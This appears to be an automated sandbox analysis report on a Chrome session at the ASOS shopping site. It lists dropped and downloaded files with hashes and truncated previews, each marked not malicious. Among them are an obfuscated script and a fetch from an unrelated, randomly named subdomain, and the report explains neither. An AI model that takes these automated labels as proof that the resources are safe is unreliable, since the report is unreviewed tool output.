                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (37946), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):38002
                                                                                                                                                                                                                                                                  Entropy (8bit):5.2633730377792345
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:5TTvyo0BZbguOlSoTPsrbFFBymqxZ+xnF54i/7M9et+PtaRoKm/ycfqr:RTvEZbguOUnoO
                                                                                                                                                                                                                                                                  MD5:AC93E0F884509FA284C6B4050C14B1C2
                                                                                                                                                                                                                                                                  SHA1:65F0342213FEB3BB2FB5262F6E83A9B152983AAD
                                                                                                                                                                                                                                                                  SHA-256:2421B0D4979D69042E5549D4FF9C1BDADF6B75512C497E5C17381EFC15A6D1B5
                                                                                                                                                                                                                                                                  SHA-512:329BD5816093E4BEE34FF5EE59C9DD1B7968E5F6757A7054B07D1D3730BDCA7EBAE34B0BFCB05FA7F0EB1202A9264DE815019C108E6C022576FF98078031662D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:"use strict";var _objectHasOwn=function(t,e){if(null==t)throw new TypeError("Cannot convert undefined or null to object");return Object.prototype.hasOwnProperty.call(Object(t),e)};define("bagsdk/global",[],(function(){return window})),define("bagsdk/utils/getInstanceEventBus",["jquery"],(function(t){if("function"==typeof t)return t({})})),define("bagsdk/utils/sdkInstanceAsyncLoader",["bagsdk/utils/getInstanceEventBus"],(function(t){const e={load:function(e,n,o,i){i.isBuild?o(e):(t.bagSdkInstantiated&&o(e),t.on("bagSdk:instanceReady",(function(){o(e)})))}};return e})),define("Asos.Commerce.Bag.Sdk",["bagsdk/global","bagsdk/utils/sdkInstanceAsyncLoader!dummyModuleName"],(function(t){return["asos","commerce","_bagSdkInstance"].reduce((function(t,e){if(void 0!==t)return t[e]}),t)})),define("bagsdk/config/configuration",[],(function(){return{}})),define("bagsdk/config/defaultConfiguration",["bagsdk/global"],(function(t){return{postMessageUrl:"https://"+t.location.hostname+"/bag/gateway/",ba
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2861
                                                                                                                                                                                                                                                                  Entropy (8bit):7.899673741861986
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:6iEECouYVFJ+3dAYolftq+1AMmwIT9RlUg4NiQwCAtm2Pj/9T9Z+BLwYaVulsnM+:6igHYvYolR1DdIT9RugWiQwCAp99iaVZ
                                                                                                                                                                                                                                                                  MD5:7F0979E9A0C7CCD8B56C28C8EBA3AC03
                                                                                                                                                                                                                                                                  SHA1:609FC9759AC7C45DFFE5A5187B291733A4CF801B
                                                                                                                                                                                                                                                                  SHA-256:EFAEE361B8631ED1213F9795579DB451DA689380A4ACA4A741EBDC6F2F9C6499
                                                                                                                                                                                                                                                                  SHA-512:16EF664F0E787A0CA5D0FE35B4C6DB3350919AA28DCC87C26BF18210B6B6E56A07CFC2138427535CCD00D70E14F99585870FE0359BD832F51FD36C476F17EBF7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx...o.G......1i.@h .C.....=...D.q.H..?..z..N......'.*..]+].S.,.?.T..A.^A.J9J.D..............{....:v^l.ewg.m?yf..gf...C...Zb..:>.p...T*.PQ./.M.(..b.[.Vq.l.G.....v..........f...=88.#..lgx.....+...Wc............../6[.UV..............^.,..._.<..1.r:...p8H.$b..g.UU.8.8'.Ib.H$.9....'.x!..........^.Y..fCU.b......s..7...w..\/2W=jjj...Fb..B..z.\.h......Q. ...-...J..-....:..>..E..n...{l...r2|.4..e..?_...fq@.f.A:GFF.q.Wo...d.|...R.;.ti.p..RQ.....n9..GS.N.."...h./?..EP...O....w3..LqJ.b.....7.w...4uH...=]...K..@O2.....p..js..f..(.....&.0)4D.v..y...>.U.....*.|O.....2.k.}..x....Tl.......Y..Wn....%+=K.ZDv.".Qj.-...5.}.....p...k6..'...H.T?...i.*...j..kc.v.~An.1......?:O.{4..0..da..p...5.....,.. QH....U.......%...Vy....../\.M..)y.._|...../.Tb3.9=mB..\.4.c...!u...~q.^|..2....m.......j.....n...<.Mx.We@t1.8..7(t.*..UJ.....EB.>..T...\....\.%^Jy+...=...=|.I...g.H.!.h...:<..Y..{g...%..%Q..G..F....mC#.N.W...E..-...'e..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (63485), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):68888
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1178772532048855
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:1Iyvfz9fG9ZzVt7zzwosL8zw/sLAzwCsL259soTYLZ4+j/o34ee2jIY1i4U6b6NR:pIpV9grleZd2HYLq+Toy2sIudz7f
                                                                                                                                                                                                                                                                  MD5:4378A9141BD7C4D9124B7BCF03F14E43
                                                                                                                                                                                                                                                                  SHA1:DBD10946E798756DDABA5B422DA035CFCBE56CEC
                                                                                                                                                                                                                                                                  SHA-256:52E8C1449696319E0FE4B379D68FB4A1E11D9AB61EDD85E2D8720ACF7BDF8C2E
                                                                                                                                                                                                                                                                  SHA-512:DDF10B0EFFBFFA3783CC59555B65F644B00FB494DEE3554F52CC60480F7148E64099EC0377F3C731A3AA980A10D68A5FA7990914423236220035B95C09505FAC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[856],{51578:(e,i,a)=>{a.r(i),a.d(i,{default:()=>v});var r=a(60141);const n=JSON.parse('{"accessibility_breadcrumbs":"br.dkrummer","accessibility_label_back":"Tilbage","accessibility_label_loading":"Indl.ser","accessibility_search_clear_text_button_description":"Ryd tekst","accessibility_skip_to_content":"G. til hovedindhold","asos_details":"ASOS-detaljer","burger_open_navigation_label":".bn navigationsmenu","country_selector_button_change_button":"Skift","country_selector_button_heading":"Shopper fra:","country_selector_button_locationtext":"Du er i","delivery_identifier_or":"Eller","dtc_atb_reservation_sellerchangemessage":"Vi har foretaget nogle lageropdateringer, og s.lgeren af din vare er .ndret. Den nye s.lgers priser og leveringstider kan v.re anderledes, s. tag et kig i din indk.bskurv.","errors_something_doesnt_look_right":"Hov! Der er noget galt.","footer_international_sites_label":"Nogle af vo
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):7428
                                                                                                                                                                                                                                                                  Entropy (8bit):5.006087809037582
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y12tMzqy/bDzp5LkuD8QAKnv+wrBANASYmharWsMx7lg9ruCnIz0byCvnHZsHUC/:TvuUas5kWHaAobNVJR3jTPA
                                                                                                                                                                                                                                                                  MD5:7D492453B534B0D017C13A0D78E1AD4E
                                                                                                                                                                                                                                                                  SHA1:D88C99DCCBF5F27CD202F449127694DFD32E06DA
                                                                                                                                                                                                                                                                  SHA-256:8512D2FCADC1122F150D31E36913D425105DFD1191D54CDBF543BC82A6488AF3
                                                                                                                                                                                                                                                                  SHA-512:09B3BFF0BC17422E85F559B8EE2CF25DC20B27135F95DF5BEE5EEE70DE31A42DFE3EBFD06DC60297F2A4696CB7B60A5FF60C061C6294B247709A4D5036136DE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:"https://c.go-mpulse.net/api/config.json?key=KEKMC-5QPEH-Y5FHE-8AH54-JDSN3&d=www.asos.com&t=5767430&v=1.766.0&sl=0&si=5e39006e-f20a-485e-a707-cca0dd07f1b1-sm4tar&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,LOGN&acao=&ak.ai=243464"
                                                                                                                                                                                                                                                                  Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1730229083672,"h.cr":"a4a15eb860f03b77de6be0fc65b74681dc309588-e6f7476a-c58388ad","session_id":"6d56e97d-38ce-4cc7-9878-1f9d780233d1","site_domain":"asos.com","beacon_url":"//684dd32e.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):330933
                                                                                                                                                                                                                                                                  Entropy (8bit):5.896657003351952
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:Nuvi/zJlHStZF+6iBwYrKOSAF01cw5Ya+d:qgStZFd2wJOX2QRd
                                                                                                                                                                                                                                                                  MD5:2AB26B73D9D632AD348EDAA2A002BC1D
                                                                                                                                                                                                                                                                  SHA1:AA4CAAC63CD55B9B3E3AA0FF17079804963D1A37
                                                                                                                                                                                                                                                                  SHA-256:858BF1F48350424972729B8AC1D3A785BA5FF202F0CBCEFEE4D69066D951C3BD
                                                                                                                                                                                                                                                                  SHA-512:7E4FD84AC40CA8783084D1A3FFE57217C3CECFE0AE23320BF363FA582B5A99F1B72B157B097A4353840A0E3918647448A56333D47FFB4E69F29F9CFABAF3E49C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function(){Rb();kjs();XZs();var pp=function(Y8){var DW=Y8[0]-Y8[1];var Rl=Y8[2]-Y8[3];var Ck=Y8[4]-Y8[5];var dL=YB["Math"]["sqrt"](DW*DW+Rl*Rl+Ck*Ck);return YB["Math"]["floor"](dL);};var E8=function l9(X4,IN){var C5=l9;do{switch(X4){case DQ:{X4-=PQ;while(UL(Et,K3)){var bm=RE(ml(Bp(Et,Sl),TR[ml(TR.length,QC)]),JW.length);var p9=v3(vk,Et);var n9=v3(JW,bm);m3+=l9(fX,[Vl(jt(zm(p9),zm(n9)),jt(p9,n9))]);Et--;}}break;case fX:{var c4=IN[dq];if(xR(c4,lb)){return YB[Z3[f9]][Z3[QC]](c4);}else{c4-=gB;return YB[Z3[f9]][Z3[QC]][Z3[K3]](null,[Bp(YL(c4,mr),zQ),Bp(RE(c4,jf),YA)]);}X4=pn;}break;case Ff:{if(UL(C8,K3)){do{w4+=J8[C8];C8--;}while(UL(C8,K3));}X4+=vn;return w4;}break;case Zn:{X4=DQ;var Et=ml(vk.length,QC);}break;case EQ:{return sl;}break;case Yn:{return BC(tX,[m3]);}break;case DK:{var z3=IN[dq];X4=EQ;var sl=Bp([],[]);var Zp=ml(z3.length,QC);if(UL(Zp,K3)){do{sl+=z3[Zp];Zp--;}while(UL(Zp,K3));}}break;case Sx:{var Sl=IN[dq];var OE=IN[xP];X4+=IK;var Wm=IN[EP];var JW=LL[jC];var m3=Bp([],[]);var v
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65468), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):112133
                                                                                                                                                                                                                                                                  Entropy (8bit):5.357056757721724
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:WnaL75lqzuFeK3wuTYrX6cFgPofbBpqqWz45jXDi+AW1zvPgNumBO0sTCteSjxzF:WnaL7rqzTVHfLuz4BXm+AAL0O0dNxzF
                                                                                                                                                                                                                                                                  MD5:073F90A0B2456DB0BDA0A8012B4C8455
                                                                                                                                                                                                                                                                  SHA1:675F2D5CB993A1F8D15E5A5D80B6CE60C39CA4E1
                                                                                                                                                                                                                                                                  SHA-256:F01C4B46E70121861FF6877E1F76FE23D6842B5FEB6C24B475E76229CD59D84A
                                                                                                                                                                                                                                                                  SHA-512:AEF75E427B8C54D54AF4EF45CB4F88058BA01ADBE8D1812A945B92781EF86A39AE9A9C99DD3062080D2AAF75F07ED4A08CB48C03916CF74A3E9FB656771F31E0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/assets/uilib/content-ui-library-5.0.0-c2f7f9fe-40.js
                                                                                                                                                                                                                                                                  Preview:!function(){"use strict";const e=e=>{e.panel.style.height="auto",e.panel.height=e.panel.offsetHeight+"px",e.visible||(e.panel.style.height=0)},t=t=>{const r={visible:!1,animating:!1,panel:t.nextElementSibling,button:t.querySelector("button")};r.panel.setAttribute("style","display: block");(t=>{let r=window.innerWidth;e(t),window.addEventListener("resize",(()=>{r!=window.innerWidth&&(r=window.innerWidth,e(t))}))})(r),t.addEventListener("click",(e=>{e.preventDefault(),r.visible?(e=>{e.visible=!1,e.button.setAttribute("aria-expanded","false"),e.panel.setAttribute("aria-hidden","true"),e.button.classList.remove("open"),e.panel.style.height=0})(r):(e=>{e.visible=!0,e.button.classList.add("open"),e.button.setAttribute("aria-expanded","true"),e.panel.setAttribute("aria-hidden","false"),e.panel.style.height=e.panel.height})(r)}))},r=e=>{const t=window.innerWidth,[r,n,o]=(e=>{if(e>=736)return[40,".desktop-bottom",".hero-slug"];return[32,".mobile-bottom",".hero-slug-mobile"]})(t),a=e.querySelect
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5795
                                                                                                                                                                                                                                                                  Entropy (8bit):7.898799232269713
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yErukjCK8wnfadmDO/iZ4m1LOQh0I6VvDAeLteulXwhmPtxr2/R:yPi8eScx4m1CQh0R0eLtLXwhm2Z
                                                                                                                                                                                                                                                                  MD5:E7A62467D102E596F947DC41929FA80F
                                                                                                                                                                                                                                                                  SHA1:68357309E9E8CDBD8A202B5BF19BF6ECD9089DC0
                                                                                                                                                                                                                                                                  SHA-256:EC0CDFF11D0AF6854EF1834862094FBF4C4AE8801D8D1295C6D15C21A330E0EE
                                                                                                                                                                                                                                                                  SHA-512:44258D28BB6ED94B68CADE5D1A018E899B8C40A71FDACA853004E9C58054637099B8DEC7D2931CD3757FB707CF87255F9481A3F21774F6DCE5695AFCAA5122B7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6dVEIzpM3JHrpCYl9jcz_iqJn4_8jFXNv0yxm-6V4bX-xWihKEepTmtHOMOHVz3RjBTrXT7dN7gYxYTmvM9pch9frD_2Mt3aIGC1iHFdAculPLW-E-pvMwfXqdU-eFFIvfmgYdo6khSBA0SncV71vkgo0b4sCXigzgrEIRJFzMpiO5gqUj7ZosUIYXEi-OK8ItEStpAw4diRUHM1nMSnHfpBwisw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=6666e44f208ad0c5
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...w{.Y.>\......'y..x.I.A.#D2.W...[...`/8<`u#.O<....w.<..].) m........Ld...i.b.Lm..1..h.2.8$u..8....SZ.....\.A..tJ.....K.y.|.?.Lt.-...`.]..t.1....$.ci'...<c6Y......P....0.s.....|.Pm.P2..\.q...6...m..8..*.f...?....m.....o%...I<.!.,@`q......2.v....u..p.....#....#...wD<..@c.....$aOLu.x.! ...{.I.a......a.\.Jj...&.j.....;.]..o.P.o....W.<...3..pNr...*;...%#P.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (37946), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):38002
                                                                                                                                                                                                                                                                  Entropy (8bit):5.2633730377792345
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:5TTvyo0BZbguOlSoTPsrbFFBymqxZ+xnF54i/7M9et+PtaRoKm/ycfqr:RTvEZbguOUnoO
                                                                                                                                                                                                                                                                  MD5:AC93E0F884509FA284C6B4050C14B1C2
                                                                                                                                                                                                                                                                  SHA1:65F0342213FEB3BB2FB5262F6E83A9B152983AAD
                                                                                                                                                                                                                                                                  SHA-256:2421B0D4979D69042E5549D4FF9C1BDADF6B75512C497E5C17381EFC15A6D1B5
                                                                                                                                                                                                                                                                  SHA-512:329BD5816093E4BEE34FF5EE59C9DD1B7968E5F6757A7054B07D1D3730BDCA7EBAE34B0BFCB05FA7F0EB1202A9264DE815019C108E6C022576FF98078031662D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/asos-ui/sdk/bag-sdk-9.0.0.min.js
                                                                                                                                                                                                                                                                  Preview:"use strict";var _objectHasOwn=function(t,e){if(null==t)throw new TypeError("Cannot convert undefined or null to object");return Object.prototype.hasOwnProperty.call(Object(t),e)};define("bagsdk/global",[],(function(){return window})),define("bagsdk/utils/getInstanceEventBus",["jquery"],(function(t){if("function"==typeof t)return t({})})),define("bagsdk/utils/sdkInstanceAsyncLoader",["bagsdk/utils/getInstanceEventBus"],(function(t){const e={load:function(e,n,o,i){i.isBuild?o(e):(t.bagSdkInstantiated&&o(e),t.on("bagSdk:instanceReady",(function(){o(e)})))}};return e})),define("Asos.Commerce.Bag.Sdk",["bagsdk/global","bagsdk/utils/sdkInstanceAsyncLoader!dummyModuleName"],(function(t){return["asos","commerce","_bagSdkInstance"].reduce((function(t,e){if(void 0!==t)return t[e]}),t)})),define("bagsdk/config/configuration",[],(function(){return{}})),define("bagsdk/config/defaultConfiguration",["bagsdk/global"],(function(t){return{postMessageUrl:"https://"+t.location.hostname+"/bag/gateway/",ba
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com/qdpjrzhatduxxtuetbpHeUBGVUCFBHGNDJGJTMHXFMZFJYWFCBGLPUJYUAPTPOGHOIQ
                                                                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1038)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1127
                                                                                                                                                                                                                                                                  Entropy (8bit):5.348239999385878
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:+cKBOSCtD1XwsZqIx7tK988dirEvW0NVy2hdp:+l0SCXqIxt98dirEvW0NVy2Lp
                                                                                                                                                                                                                                                                  MD5:7F3A6A3D7F495B63DCB141D50B82F200
                                                                                                                                                                                                                                                                  SHA1:4DDC1B543B837EF71AC8E9E267EE401CD94ECB16
                                                                                                                                                                                                                                                                  SHA-256:8C14BC742C4B9E6B024585FF5EA867778291163C42D4476206EBD86CC44EAE3E
                                                                                                                                                                                                                                                                  SHA-512:71F6764EDF5B8BF7E2903B8AFE48B473AB044450E3D65C8690F07882E019AA7AAF1631569290DEE0D5E62E9AABCE0D3AB4B5D4E7CB9C6186F4BC268A3477ED8D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*! v8.2.0, license file: uuid.LICENSE.txt */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define("uuid",e):(t=t||self).uuid=e()}(this,(function(){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto),e=new Uint8Array(16);function o(){if(!t)throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return t(e)}for(var n=[],r=0;r<256;++r)n.push((r+256).toString(16).substr(1));return function(t,e,r){var u=(t=t||{}).random||(t.rng||o)();if(u[6]=15&u[6]|64,u[8]=63&u[8]|128,e){r=r||0;for(var d=0;d<16;++d)e[r+d]=u[d];return e}return function(t,e){var o=e||0;return(n[t[o+0]]+n[t[o+1]]+n[t[o+2]]+n[t[o+3]]+"-"+n[t[o+4]]+n[t[o+5]]+"-"+n[t[o+6]]+n[t[o+7]]+"-"+n[t[o+8]]+n[t[o+9]]+"-"+n[t[o
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):102
                                                                                                                                                                                                                                                                  Entropy (8bit):4.997660514702103
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:JSbMqSL1cdXWKQKT/hlkMYatGECWaee:PLKdXNQKzLQL
                                                                                                                                                                                                                                                                  MD5:9AFB0D35BB088B3036561313BF7CE1F4
                                                                                                                                                                                                                                                                  SHA1:C7F3FDE34C537242969FBBD736B5B129611F1694
                                                                                                                                                                                                                                                                  SHA-256:6E4501CE6F65A1B8671A9D31A8F5AB56DFA4E30AA7A4A971DAA1544AB2EB53C1
                                                                                                                                                                                                                                                                  SHA-512:C08FAB7DD122743F8F942AC5F0F1A05A2A44BEFD7DA677074CC3D2D464A106CE88047C1396F4C99DABBF99541230CA37B05158F448E7014B36E1E9FE38C572AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb
                                                                                                                                                                                                                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (15771), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):15773
                                                                                                                                                                                                                                                                  Entropy (8bit):4.941666446112814
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:q576FGrF9/WnOtNjsYwIMts++OTwFTWQTnT1q5fxSxRfu9Rb9yoLCDBtsFqAGj6c:OGFGkgWYwdqGJ0OO/hFrApRuYO+L8H
                                                                                                                                                                                                                                                                  MD5:F4752503860C258FED0EDF5A7D40DCB9
                                                                                                                                                                                                                                                                  SHA1:6E9D06488702A945DAF0A2AA03F58E18743E7B50
                                                                                                                                                                                                                                                                  SHA-256:5F3AE0CFA09B5D615295722CAE05096F88395B4BD8020260D7797CEA5E55B538
                                                                                                                                                                                                                                                                  SHA-512:EC99718E852473E3C7339A5D78A7DA10475AD78DC714D973F9FDB0ECDEBECFA5C5ECD9150C0BCAEBFFA37A50E78D84C0DAB30F1971BE861EF53B2492B8DE5E27
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20241015
